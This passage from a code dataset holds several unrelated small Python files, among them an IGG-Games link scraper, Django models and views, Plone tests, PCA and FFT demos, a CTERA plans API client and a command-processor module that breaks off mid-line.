step = int(num/2)\n    #print(step)\nfor i in range(step):\n    if left % 2 == 0 and right %2 == 0:\n        flag = True \n        break\n    left += 1\n    right -= 1\n    #print(left,right)\n    \nif flag:\n    print(\"YES\")\nelse:\n    print(\"NO\")","sub_path":"dev/methds/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"609964808","text":"def main(): \r\n    try:\r\n        from bs4 import BeautifulSoup\r\n        import urllib.request\r\n        import re\r\n    except ImportError:\r\n        print(\"Some modules are not installed. 
Run \\n python -m pip install -r requirements.txt\")\r\n exit()\r\n\r\n\r\n\r\n url_choice = input(\"IGG-Games Link: \")\r\n if not (url_choice.startswith(\"http://\") or url_choice.startswith(\"https://\")):\r\n url_choice = \"http://\" + url_choice\r\n req = urllib.request.Request(\r\n url_choice, \r\n data=None, \r\n headers={\r\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'\r\n }\r\n )\r\n\r\n possible_sources = [\"MegaUp.net\", \"Rapidgator\", \"Mega.co.nz\", \"Openload.co\", \"KumpulBagi\", \"UpFile\", \"FileCDN\", \"Go4Up (Multi Links)\", \"Uploaded\", \"Uptobox\", \"Google Drive\"] #Download Sources\r\n existing_sources = []\r\n\r\n try:\r\n request = urllib.request.urlopen(req)\r\n except urllib.error.URLError:\r\n print(\"Url could not be opend.\")\r\n exit()\r\n\r\n soup = BeautifulSoup(request, \"lxml\")\r\n\r\n for paragraph in soup.find_all(\"p\"):\r\n for source in possible_sources:\r\n if \"Link \" + source in paragraph.text:\r\n existing_sources.append(source)\r\n\r\n if not existing_sources:\r\n print(\"No Link sources found.\")\r\n exit()\r\n for counter, value in enumerate(existing_sources):\r\n print(str(counter + 1) + \") \" + value) \r\n source_choice = input(\"Choose download source: \")\r\n while not isinstance(source_choice, int):\r\n try:\r\n source_choice = int(source_choice)\r\n if source_choice > len(existing_sources):\r\n raise ValueError\r\n except ValueError:\r\n source_choice = input(\"Please enter a number between 1 and \"+str(len(existing_sources))+ \": \")\r\n \r\n\r\n\r\n for paragraph in soup.find_all(\"p\"):\r\n if existing_sources[source_choice - 1] in paragraph.text:\r\n print(\"\\n\")\r\n for hyperlink in paragraph(\"a\"):\r\n string = hyperlink.get('href')\r\n string = re.sub('%23', '#', string)\r\n print(\"http\"+string[string.rfind(\"://\"):])\r\n print()\r\n break\r\n\r\nmain()\r\n","sub_path":"igg_scraper.py","file_name":"igg_scraper.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"43212555","text":"# -*- coding: utf-8 -*-\nfrom plone.app.testing import logout\nfrom Products.PloneKeywordManager.config import PROJECTNAME\nfrom Products.PloneKeywordManager.tests.base import BaseIntegrationTestCase\nfrom zope.component import getMultiAdapter\n\n\nclass ControlPanelTestCase(BaseIntegrationTestCase):\n\n def setUp(self):\n super(ControlPanelTestCase, self).setUp()\n self.controlpanel = self.portal['portal_controlpanel']\n\n def test_controlpanel_has_view(self):\n view = getMultiAdapter(\n (self.portal, self.request), name='prefs_keywords_view')\n view = view.__of__(self.portal)\n self.assertTrue(view())\n\n def test_controlpanel_view_is_protected(self):\n from AccessControl import Unauthorized\n logout()\n with self.assertRaises(Unauthorized):\n self.portal.restrictedTraverse('@@prefs_keywords_view')\n\n def test_controlpanel_installed(self):\n actions = [a.getAction(self)['id']\n for a in self.controlpanel.listActions()]\n self.assertIn('keywordmanager', actions)\n\n def test_controlpanel_removed_on_uninstall(self):\n qi = self.portal['portal_quickinstaller']\n qi.uninstallProducts(products=[PROJECTNAME])\n actions = [a.getAction(self)['id']\n for a in self.controlpanel.listActions()]\n self.assertNotIn('keywordmanager', 
actions)\n","sub_path":"Products/PloneKeywordManager/tests/test_controlpanel.py","file_name":"test_controlpanel.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"99681200","text":"import keras\nimport numpy as np\nfrom keras import datasets\nfrom numpy.linalg import eig\nimport matplotlib.pyplot as plt\nfrom numpy import cov\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom keras.datasets import mnist\nfrom sklearn.metrics import accuracy_score\n\n\n\ndef reduce_dimensions_pca(data):\n \"\"\"\n\n :param data: data to reduce dimension\n :return: data with reduced dimensions\n \"\"\"\n\n mean = np.mean(data, axis=0)\n centered = data - mean\n\n cov_mat = cov(centered.T)\n eig_val, eig_vec = eig(cov_mat)\n eig_pairs = [(np.abs(eig_val[i]), eig_vec[:, i]) for i in range(len(eig_val))]\n\n # Sort the (eigenvalue, eigenvector) tuples from high to low\n eig_pairs.sort(key=lambda x: x[0], reverse=True)\n\n # Checking the eig values\n eig_val_sorted = np.array([x[0] for x in eig_pairs])\n\n # Ordering the eig vectors into columns\n eig_vec_sorted = np.array([x[1] for x in eig_pairs]).T\n return mean, eig_val_sorted, eig_vec_sorted\n\nif __name__ == \"__main__\":\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n x_train = x_train.reshape(60000, 28 * 28)\n x_test = x_test.reshape((10000, 28 * 28))\n x_train = x_train / 255\n x_test = x_test / 255\n\n # getting the mean, eig_val and eig_vecs\n mean, eig_val, eig_vec = reduce_dimensions_pca(x_train)\n dimensions = [40, 80, 200]\n clf = KNeighborsClassifier(n_neighbors=3)\n for dim in dimensions:\n x_train_new = x_train - mean\n reduced = x_train_new.dot(eig_vec[:, :dim])\n clf.fit(reduced, y_train)\n x_test_new = x_test - mean\n x_test_proj = x_test_new.dot(eig_vec[:, :dim])\n pred = clf.predict(x_test_proj)\n print('dimensions {0}, acc {1}'.format(dim, accuracy_score(y_test, pred)))\n","sub_path":"submission/PCA.py","file_name":"PCA.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"296536326","text":"from xml.etree import ElementTree\n\nclass ResourcesUtil:\n\n @staticmethod\n def GetEntryValue(entry):\n tree = ElementTree.parse(\"Resources/MySql/Sentences.xml\")\n for i in range(len(tree.findall(\"entry\"))):\n item = tree.getroot()[i]\n if (item.items()[0][1] == entry):\n return item.text\n return None","sub_path":"Util/ResourcesUtil.py","file_name":"ResourcesUtil.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"607785393","text":"import numpy as np \nimport matplotlib.pyplot as plt \n\ndef f(x):\n\tif x != 0:\n\t\treturn(np.exp(-x**2))\n\telse:\n\t\treturn(1)\n\t\t\n\nx_min= -50\nx_max= 50\nn= 256 #number of points taken\ndx= (x_max - x_min)/(n-1)\nx= np.zeros(n)\ny= np.zeros(n)\n\nfor i in range(n):\n\tx[i]= x_min + i*dx\n\ty[i]= f(x[i])\n\ny_ft_np= np.fft.fft(y,norm='ortho') # Fourier transform that numpy gives\n\nk_np= np.fft.fftfreq(n, d= dx) # k values that numpy returns\nk= 2*np.pi*k_np # true values of k\n\nph_factor= np.exp( -1j *k*x_min) #phase factor \ny_ft = dx * np.sqrt(n/(2.0*np.pi)) * ph_factor * y_ft_np # True Fourier transform \n\n\nplt.plot(x,y,'r')\nplt.scatter(x,y)\nplt.title('Plot of sinc function')\nplt.show()\t\n\nplt.plot(k,y_ft,'b')\nplt.scatter(k,y_ft)\nplt.title('Plot of Fourier 
transform')\nplt.show()","sub_path":"prob1.py","file_name":"prob1.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"60060031","text":"from core import *\nfrom random import randint\n\n# family from list of lists\n\"\"\"\nF = [[1,2],[1],[3],[4,3],[4]]\nF = familyFromList(F)\n\"\"\"\n\n\n# makes a random family\n# and makes it union closed\n\"\"\"\nF = randomFamily(4,6)\nF = makeUnionClosed(F)\n\"\"\"\n\n\"\"\"\nn = 4\nU = frozenset(range(1,n+1))\nPU = powerset(U)\nPPU = powerset(PU)\nprint(\"There are \",len(PU),\" members in total\")\nprint(\"There are \",len(PPU),\" families in total\")\nSF = 0\nMF = 0\nNUHCF = 0\nUCF = 0\nfor f in PPU:\n    if isSeperating(f):\n        SF += 1\n    \n    if isMinimal(f):\n        MF += 1\n    \n    if isUnionClosed(f):\n        UCF += 1\n    \n    if (not isUnionClosed(f)) and hasCommon(f):\n        NUHCF += 1\n    \nprint(\"There are \",SF,\" separating families in total\")\nprint(\"There are \",MF,\" minimal families in total\")\nprint(\"There are \",UCF,\" families that are union closed in total\")\nprint(\"There are \",NUHCF,\" families that are not union closed but do have a common element, in total\")\n\"\"\"\n\n# this family is a counter-example to the non-theorem that\n# The smallest(in cardinality) nonempty set contains\n# an element that is in at least half the members.\n\"\"\"\nG1 = familyFromList([[],[1],[1,2,3]])\nG2 = familyFromList([[],[2],[1,2,3]])\nG3 = familyFromList([[],[3],[1,2,3]])\n\nH1 = familyFromList([[5,6,7,8,9],[4,6,7,8,9]])\nH2 = familyFromList([[4,5,7,8,9],[4,5,6,8,9]])\nH3 = familyFromList([[4,5,6,7,9],[4,5,6,7,8]])\n\nR1 = familyFromList([[],[1,2,3]])\nR2 = powerset([1,2,3])\nR3 = familyFromList([[4,5,6,7,8,9]])\n \nF = R1.union(mixFamilies(G1,H1))\nF = F.union(mixFamilies(G2,H2))\nF = F.union(mixFamilies(G3,H3))\nF = F.union(mixFamilies(R2,R3))\ninspectFamily(F)\n\"\"\"\n\n\n\"\"\"\nn = 10\nprint(\"making powerset of universe...\")\nP = powerset(range(1,n+1))\nprint(\"power set has cardinality \",len(P))\nprint(\"done\")\nfor i in range(10000):\n    print(i)\n    k = randint(3, len(P)/64)\n    f = set(sample(P,k))\n    #f = makeUnionClosed(f)\n    inspectFamily(f)\n\"\"\"\n\nfor n in range(1,5):\n    U = frozenset(range(1,n+1))\n    PU = powerset(U)\n    PPU = powerset(PU)\n    UCF = 0\n    for f in PPU:\n        if isUnionClosed(f):\n            UCF += 1\n    print(n, UCF)\n\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"647041741","text":"from sys import stdin\nfrom queue import Queue\nfrom math import ceil\n\nlista = []\ngrafo = []\nstringNum = {}\nvisitados = []\n\ndef bfs(ini, fin):\n    global grafo, visitados\n    cola = Queue()\n    cola.put(ini)\n    visitados[ini] = 1\n    while cola.empty() == False:\n        u = cola.get()\n        if u == fin:\n            break\n\n        for tupla in grafo[u]:\n            v, star, end = tupla\n            if visitados[v] == -1:\n                visitados[v] = (visitados[u] * end)/star\n                cola.put(v)\n\n\ndef lectura(tam, a):\n    global stringNum, grafo\n    grafo.append([])\n    stringNum[a] = tam\n    return tam + 1\n\n\ndef reducir(a, b):\n    i = 2\n    while i <= min(a, b):\n        if a % i == 0 and b % i == 0:\n            a //= i\n            b //= i\n\n        else:\n            i += 1\n\n    return [a, b]\n\n\ndef main():\n    global grafo, visitados, stringNum, lista\n    tam = 0\n    lista = list(map(str, stdin.readline().split()))\n    while lista[0] != \".\":\n        if lista[0] == \"!\":\n            temp = reducir(int(lista[1]), int(lista[4]))\n            ini_n = stringNum.get(lista[2])\n            if ini_n == 
None:\n tam = lectura(tam, lista[2])\n ini_n = tam - 1\n\n fin_n = stringNum.get(lista[5])\n if fin_n == None:\n tam = lectura(tam, lista[5])\n fin_n = tam - 1\n\n grafo[ini_n].append((fin_n, temp[0], temp[1]))\n grafo[fin_n].append((ini_n, temp[1], temp[0]))\n\n else:\n ini_n = stringNum.get(lista[1])\n if ini_n == None:\n tam = lectura(tam, lista[1])\n ini_n = tam - 1\n\n fin_n = stringNum.get(lista[3])\n if fin_n == None:\n tam = lectura(tam, lista[3])\n fin_n = tam - 1\n \n visitados = [-1 for i in range(tam)]\n bfs(ini_n, fin_n)\n\n if visitados[fin_n] != -1:\n i = 1\n m = visitados[fin_n]\n a = m\n while (i * m) - ((i * m)//1) != 0:\n i += 1\n a = i * m\n b = int(a)\n c = a - b \n if c > 0.9999999999999:\n a = ceil(a)\n break\n\n print(\"{} {} = {} {}\".format(i, lista[1], ceil(a), lista[3]))\n \n else:\n print(\"? {} = ? {}\".format(lista[1], lista[3]))\n lista = list(map(str, stdin.readline().split()))\n\n\nmain()","sub_path":"Taller 3/10113 Exchange Rates.py","file_name":"10113 Exchange Rates.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"650949334","text":"#coding:utf-8\nimport pandas as pd\n\n#pandas读excel\nres = pd.read_excel(\"debug_api.xlsx\")\n#输出标题列\nprint(res.columns.values)\n#输出第一行数据不包含表头\ndata = res.loc[0].values\nprint(\"对应类型是:\",type(data),\"数据是:\",data)\n\n#pandas写excel\nwrite_data = {\"姓名\":[\"测试1\",\"测试2\",\"测试3\",\"测试4\"],\"性别\":[\"测试数据1\",\"测试数据2\",\"测试数据3\",\"测试数据4\"]}\ndf = pd.DataFrame(write_data)\nwriter_exe = pd.ExcelWriter(r\"test1.xlsx\")\n\ndf.to_excel(writer_exe,sheet_name=r\"sheet1\",index=False,header=True)\nwriter_exe.save()\n","sub_path":"untitled/dome1/Requests_demo-master/demo_excelddtdriver/common/readexcel_pandas.py","file_name":"readexcel_pandas.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"563542689","text":"from rest_framework.decorators import api_view,permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework.authtoken.models import Token\n\nfrom .serializers import RegistrationSerializer\n\n# Create your views here.\n\n\n@api_view(['POST', ])\n@permission_classes(())\ndef register(request):\n if request.method == 'POST':\n serializer = RegistrationSerializer(data=request.data)\n data = {}\n if serializer.is_valid():\n account = serializer.save()\n data['email']=account.email\n token = Token.objects.get(user=account).key\n data['token'] = token\n else :\n data = serializer.errors\n\n return Response(data)\n","sub_path":"back-office/backOffice/authentication/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"193932385","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n\n# Create your models here.\n\nclass Town(models.Model):\n name = models.CharField(max_length=100)\n slug = models.SlugField(max_length=100)\n\n\nclass TownArea(models.Model):\n name = models.CharField(max_length=100)\n slug = models.SlugField(max_length=100)\n town = models.ForeignKey(Town, related_name='areas')\n\n\n\n\n\nclass Skill(models.Model):\n name = models.CharField(max_length=100)\n slug = models.SlugField(max_length=100)\n description = models.CharField(max_length=200)\n\nclass Language(models.Model):\n name = models.CharField(max_length=100)\n slug = 
models.SlugField(max_length=100)\n\n\nclass ProfessionalTest(models.Model):\n name = models.CharField(max_length=100)\n slug = models.SlugField(max_length=100)\n\n\nclass ProfessionalTestQuestion(models.Model):\n ask = models.CharField(max_length=100)\n ans = models.CharField(max_length=100)\n test = models.ForeignKey(ProfessionalTest, related_name='questions')\n\n\n\n\n\nclass Agency(models.Model):\n name = models.CharField(max_length=100)\n description = models.TextField()\n\nclass Sitter(models.Model):\n EMPLOYEE_TIME = (\n ('F', 'Full time'),\n ('S', 'Not full time'),\n )\n\n CHILD_AGE = (\n ('S', 'Small (1 - 3)'),\n ('A', 'Average (3 - 6)'),\n ('B', 'Big (6 - 10)'),\n )\n\n user = models.OneToOneField(User, related_name='sitter', null=True)\n agency = models.ForeignKey(Agency, related_name='sitter', null=True, blank=True)\n description = models.TextField()\n work_town = models.ForeignKey(Town, related_name='sitters_work')\n\n type_employee = models.CharField(max_length=1, choices=EMPLOYEE_TIME)\n child_age = models.CharField(max_length=1, choices=CHILD_AGE)\n avatar = models.CharField(max_length=100)\n skills = models.ManyToManyField(Skill, related_name='sitters')\n languages = models.ManyToManyField(Language, related_name='sitters')\n\n available = models.BooleanField(default=True)\n tests = models.ManyToManyField(ProfessionalTest, related_name='sitters', through='TestMembership')\n\n desired_price = models.FloatField()\n\n\n\n\nclass Events(models.Model):\n TYPE_PERIOD = (\n ('F', 'Free'),\n ('V', 'Vocation'),\n ('W', 'Work'),\n )\n\n type = models.CharField(max_length=1, choices=TYPE_PERIOD)\n start_date = models.DateTimeField()\n end_date = models.DateTimeField()\n\n sitter = models.ForeignKey(Sitter, related_name='events')\n\n\n\nclass TestMembership(models.Model):\n sitter = models.ForeignKey(Sitter)\n test = models.ForeignKey(ProfessionalTest)\n date_complete = models.DateField(auto_now_add=True)\n mark = models.IntegerField()\n\n\nclass SitterDocument(models.Model):\n name = models.CharField(max_length=200)\n path = models.CharField(max_length=100)\n sitter = models.ForeignKey(Sitter, related_name='documents')\n\n\n\nclass Parent(models.Model):\n user = models.OneToOneField(User, related_name='parent', null=True)\n\n locate_town = models.ForeignKey(Town, related_name='sitters_locate')\n address = models.CharField(max_length=255)\n avatar = models.CharField(max_length=100)\n\nclass Child(models.Model):\n avatar = models.CharField(max_length=100)\n name = models.CharField(max_length=100)\n\n parent = models.ForeignKey(Parent, related_name='children')\n description = models.TextField()\n\n birthday = models.DateField()\n\n\nTIME_PAYMENT_TYPE = (\n ('S', 'Session'),\n ('C', 'Contract'),\n )\nPAYMENT_TYPE = (\n ('F', 'Fixed'),\n ('H', 'Per hour'),\n )\n\nclass CommentBlock(models.Model):\n pass\n\nclass Comment(models.Model):\n pub_date = models.DateTimeField(auto_now_add=True)\n\n text = models.CharField(default='', max_length=255)\n user = models.ForeignKey(User, related_name='comments')\n comment_block = models.ForeignKey(CommentBlock, related_name='comments')\n\nclass Job(models.Model):\n #place and children\n children = models.ManyToManyField(Child, related_name='jobs')\n address = models.CharField(max_length=255)\n\n #payment\n time_payment_type = models.CharField(max_length=1, choices=TIME_PAYMENT_TYPE)\n payment_type = models.CharField(max_length=1, choices=PAYMENT_TYPE)\n price = models.FloatField(default=0.0)\n\n\n #filters\n skills = models.ManyToManyField(Skill, 
related_name='skills')\n    languages = models.ManyToManyField(Language, related_name='languages')\n    agency = models.BooleanField(default=False)\n    document = models.BooleanField(default=False)\n\n    auction = models.BooleanField(default=True)\n    show_auction = models.BooleanField(default=False)\n\n    show_comments = models.BooleanField(default=False)\n    comment_block = models.OneToOneField(CommentBlock, related_name='job')\n\n\nclass JobPeriod(models.Model):\n    start_date = models.DateTimeField()\n    end_date = models.DateTimeField()\n\n    job = models.ForeignKey(Job, related_name='periods')\n\n\nclass Bid(models.Model):\n    #payment\n    time_payment_type = models.CharField(max_length=1, choices=TIME_PAYMENT_TYPE)\n    payment_type = models.CharField(max_length=1, choices=PAYMENT_TYPE)\n    price = models.FloatField(default=0.0)\n\n    sitter = models.ForeignKey(Sitter, related_name='sitter')\n\n    visible = models.BooleanField(default=False)\n    approve = models.BooleanField(default=False)\n\n    job = models.ForeignKey(Job, related_name='bids')\n\n\nclass Contract(models.Model):\n    job = models.ForeignKey(Job, related_name='contracts')\n    bid = models.ForeignKey(Bid, related_name='contracts')\n\n    parent = models.ForeignKey(Parent, related_name='contracts')\n    sitter = models.ForeignKey(Sitter, related_name='contracts')\n\n\n","sub_path":"baby_test/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"351804803","text":"import logging\nfrom .base_command import BaseCommand\nfrom ..exception import CTERAException\nfrom .enum import PlanItem, PlanRetention\nfrom ..common import union\n\n\nclass Plans(BaseCommand):\n    \"\"\"\n    Global Admin Plan APIs\n    \"\"\"\n    default = ['name']\n\n    def _get_entire_object(self, name):\n        \"\"\"\n        Get a subscription plan\n\n        :param str name: Name of the subscription plan\n        \"\"\"\n        try:\n            return self._portal.get('/plans/' + name)\n        except CTERAException as error:\n            raise CTERAException('Could not find subscription plan', error)\n\n    def get(self, name, include=None):\n        \"\"\"\n        Retrieve subscription plan properties\n\n        :param str name: Name of the subscription plan\n        :param list[str] include: List of fields to retrieve, defaults to ['name']\n        :return: The subscription plan, including the requested fields\n        \"\"\"\n        include = union(include or [], Plans.default)\n        include = ['/' + attr for attr in include]\n        plan = self._portal.get_multi('/plans/' + name, include)\n        if plan.name is None:\n            raise CTERAException('Could not find subscription plan', None, name=name)\n        return plan\n\n    def add(self, name, retention=None, quotas=None):\n        \"\"\"\n        Add a subscription plan\n\n        :param dict,optional retention: The data retention policy\n        :param dict,optional quotas: The items included in the plan and their respective quota\n        \"\"\"\n        plan = self._portal.default_class('Plan')\n        plan.name = name\n        Plans._assign_retention(plan, retention)\n        Plans._assign_quotas(plan, quotas)\n        try:\n            response = self._portal.add('/plans', plan)\n            logging.getLogger().info(\"Plan created. 
%s\", {'plan': name})\n return response\n except CTERAException as error:\n logging.getLogger().error(\"Plan creation failed.\")\n raise CTERAException('Plan creation failed', error)\n\n def modify(self, name, retention=None, quotas=None, apply_changes=True):\n \"\"\"\n Modify a subscription plan\n\n :param dict,optional retention: The data retention policy\n :param dict,optional quotas: The items included in the plan and their respective quota\n :param bool,optional apply_changes: Apply provisioning changes immediately\n \"\"\"\n plan = self._get_entire_object(name)\n Plans._assign_retention(plan, retention)\n Plans._assign_quotas(plan, quotas)\n try:\n response = self._portal.put('/plans/' + name, plan)\n logging.getLogger().info(\"Plan modified. %s\", {'plan': name})\n if apply_changes:\n if self._portal.session().in_tenant_context():\n self._portal.users.apply_changes(True)\n else:\n self._portal.portals.apply_changes(True)\n return response\n except CTERAException as error:\n logging.getLogger().error(\"Could not modify subscription plan.\")\n raise CTERAException('Could not modify subscription plan', error)\n\n @staticmethod\n def _assign_retention(plan, retention):\n if retention is not None:\n plan.retentionPolicy.retainAll = retention.get(PlanRetention.All, plan.retentionPolicy.retainAll)\n plan.retentionPolicy.hourly = retention.get(PlanRetention.Hourly, plan.retentionPolicy.hourly)\n plan.retentionPolicy.daily = retention.get(PlanRetention.Daily, plan.retentionPolicy.daily)\n plan.retentionPolicy.weekly = retention.get(PlanRetention.Weekly, plan.retentionPolicy.weekly)\n plan.retentionPolicy.monthly = retention.get(PlanRetention.Monthly, plan.retentionPolicy.monthly)\n plan.retentionPolicy.quarterly = retention.get(PlanRetention.Quarterly, plan.retentionPolicy.quarterly)\n plan.retentionPolicy.yearly = retention.get(PlanRetention.Yearly, plan.retentionPolicy.yearly)\n plan.retentionPolicy.retainDeleted = retention.get(PlanRetention.Deleted, plan.retentionPolicy.retainDeleted)\n\n @staticmethod\n def _assign_quotas(plan, quotas):\n if quotas is not None:\n plan.vGateways4.amount = quotas.get(PlanItem.EV4, plan.vGateways4.amount)\n plan.vGateways8.amount = quotas.get(PlanItem.EV8, plan.vGateways8.amount)\n plan.appliances.amount = quotas.get(PlanItem.EV16, plan.appliances.amount) # EV16\n plan.vGateways32.amount = quotas.get(PlanItem.EV32, plan.vGateways32.amount)\n plan.vGateways64.amount = quotas.get(PlanItem.EV64, plan.vGateways64.amount)\n plan.vGateways128.amount = quotas.get(PlanItem.EV128, plan.vGateways128.amount)\n plan.workstationAgents.amount = quotas.get(PlanItem.WA, plan.workstationAgents.amount)\n plan.serverAgents.amount = quotas.get(PlanItem.SA, plan.serverAgents.amount)\n plan.cloudDrives.amount = quotas.get(PlanItem.Share, plan.cloudDrives.amount)\n plan.cloudDrivesLite.amount = quotas.get(PlanItem.Connect, plan.cloudDrivesLite.amount)\n\n def delete(self, name):\n \"\"\"\n Delete a subscription plan\n\n :param str username: The name of the subscription plan\n \"\"\"\n try:\n response = self._portal.delete('/plans/' + name)\n logging.getLogger().info(\"Plan deleted. 
%s\", {'name': name})\n return response\n except CTERAException as error:\n logging.getLogger().error(\"Plan deletion failed.\")\n raise CTERAException('Plan deletion failed', error)\n","sub_path":"cterasdk/core/plans.py","file_name":"plans.py","file_ext":"py","file_size_in_byte":5599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"56740317","text":"#!/usr/bin/env python\n\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport sys\nimport os\npath = os.path.abspath('..')\nsys.path.append(path)\npath = os.path.abspath('../..')\nsys.path.append(path)\nfrom covar_plotter import plot_cov_ellipse\nfrom Mmani.embedding.embed_with_rmetric import *\nfrom Mmani.embedding.spectral_embedding_ import _graph_is_connected\n\n\n\"\"\" Small demo with sdss_corrected_spectra \"\"\"\nrad = 2000 # from analyze_spectra, rad in [1000, 2000] gives dim = 1.9\n # number neighbors 3..12\nremove_outliers = True\ndegmin = 5\n\ncompute_H = True\nmdimY = 6\n\nsave_fig = True\n\n# Load spectra\n\ndata = np.load('spectra.npz')\nwavelengths = data['wavelengths']\nX = data['spectra']\nprint( X.shape )\nn_samples = X.shape[0]\n\nflann = FLANN()\nparams = flann.build_index(X)\ndists = distance_matrix( X, flindex = flann, mode='radius_neighbors', \n neighbors_radius=rad*1.5 )\nA = affinity_matrix( dists, rad )\n\n#plt.imshow(A.toarray())\n#plt.show()\n\n# Preprocessing\n\nif remove_outliers:\n degrees = np.asarray(A.sum(axis=1)).squeeze()\n deg_mean = np.mean( degrees )\n deg_std = np.std( degrees )\n iikeep = np.nonzero( degrees >= degmin )\n iikeep = iikeep[ 0 ]\n nodes_removed = n_samples - iikeep.size\n print( '---Removing ' + repr(nodes_removed) + ' nodes with degree <' + repr(degmin))\n X = X[ iikeep, : ]\n A = A.toarray()[ iikeep, iikeep ]\n dists = dists.toarray()[ iikeep, iikeep ]\n n_samples = iikeep.size\n\n# Embeddings\n\n# geometric embedding\ndistance_matrix, similarity_matrix, laplacian, Y, H = embed_with_rmetric( X, mdimY, rad )\n\n# Plot the results\n\nn_samplot = np.minimum( 1000, n_samples ) # subsample the data\niisamples = np.random.randint( 0, n_samples, size=n_samplot )\n\n\n\"\"\"\ndetH = np.linalg.det(H[:,:2,:2])\nineg = np.nonzero( detH <= 0 )\nif ineg[0].size > 0:\n print( ineg[0].size, ' negative or singular covariance matrices' )\n plt.plot( detH )\n plt.title( 'detH' )\n plt.show()\n\"\"\"\n\n# plot the evectors\n\n#plt.plot( Y, marker='.', markersize=0.4,linestyle='None' )\n#plt.title( 'evectors')\n#plt.show()\n\nax0 = 1\nax1 = 3\niax = [ax0, ax1]\nax = plt.gca()\nplt.plot( Y[iisamples,ax0], Y[ iisamples, ax1], marker='.', markersize=2,linestyle='None',label='Y' )\n#plt.show()\n\nif compute_H:\n degrees = np.asarray(similarity_matrix.sum(axis=1)).squeeze()\n degmax = np.max( degrees )\n cov0 = np.eye(2)/1.e4\n for i in range(n_samplot):\n ii = iisamples[i]\n cov = H[ ii, (1,3), (1,3) ].squeeze()\n if i in [0,3,100]:\n print( cov )\n if np.linalg.det(cov)>0:\n plot_cov_ellipse( cov*rad*5, Y[ii,(1,3)], nstd=2, ax=ax, edgecolor='none', facecolor=[ 0, degrees[ii]/degmax, 0])\n# plot_cov_ellipse( cov0, Y[ii,:2], nstd=2, ax=ax, edgecolor='none', facecolor='pink')\n# print( cov, np.linalg.det( cov ) )\n if save_fig:\n plt.savefig( \"spectra-emb\"+\".png\", format='png' )\n plt.show()\n\n\n\n\n\n","sub_path":"astrodemo/small_demo.py","file_name":"small_demo.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} 
+{"seq_id":"195050479","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals, absolute_import\nimport logging, time, copy\n\nimport pprint\n\nfrom natrix.common import exception as natrix_exceptions\n\nfrom . import serializers as adapter_serializers\n\nfrom .store import store_message\nfrom .terminalapi import TerminalAPI\n\nlogger = logging.getLogger(__name__)\n\nclass CommandProcessor(object):\n \"\"\"Command Processor\n\n Entrance of command adapter, it includes all methods about command-related process.\n There are three types of command-related message:\n - command info message\n High-level command message, it includes three attributes: command, timestamp and terminals_info.\n This type messages can generate many comamnd-request messages.\n - command request message\n\n - command response message\n\n\n \"\"\"\n\n STAGES = ('distribute', 'dead', 'response')\n\n def __init__(self, stage, command):\n if not stage in self.STAGES:\n raise natrix_exceptions.ParameterException(parameter='stage')\n else:\n self.stage = stage\n\n self.command = command\n\n def distribute_command(self):\n \"\"\"distribute command\n\n :return:\n \"\"\"\n command_adapter = adapter_serializers.CommandAdapter(data=self.command)\n if not command_adapter.is_valid():\n logger.error('Receive an invaid data : {}'.format(command_adapter.format_errors()))\n raise natrix_exceptions.TriggerBugException(\n message=u'command is invalid: {}'.format(command_adapter.format_errors()))\n\n command_adapter.process()\n\n def process_dead_command(self):\n \"\"\"process dead-command\n\n The command-reqeust message has a expirate time\n\n :return:\n \"\"\"\n command_terminal = adapter_serializers.CommandTerminal(data=self.command)\n if not command_terminal.is_valid():\n logger.error('Receive an invaid data : {}'.format(command_terminal.format_errors()))\n raise natrix_exceptions.TriggerBugException(\n message=u'command is invalid: {}'.format(command_terminal.format_errors())\n )\n\n if not command_terminal.process():\n # TODO:\n logger.error('failed')\n else:\n logger.info('success')\n\n def process_dial_response(self):\n command_response = adapter_serializers.CommandResponse(data=self.command)\n if not command_response.is_valid():\n logger.error('Receive an invaid data : {}'.format(command_response.format_errors()))\n logger.error('Error format data info: {}'.format(self.command))\n raise natrix_exceptions.TriggerBugException(\n message=u'command is invalid: {}'.format(command_response.format_errors())\n )\n\n if not command_response.process():\n # TODO:\n pass\n\n @staticmethod\n def process_unresponse():\n messages = []\n message = {\n 'errorcode': 2408,\n 'errorinfo': u'Terminal response 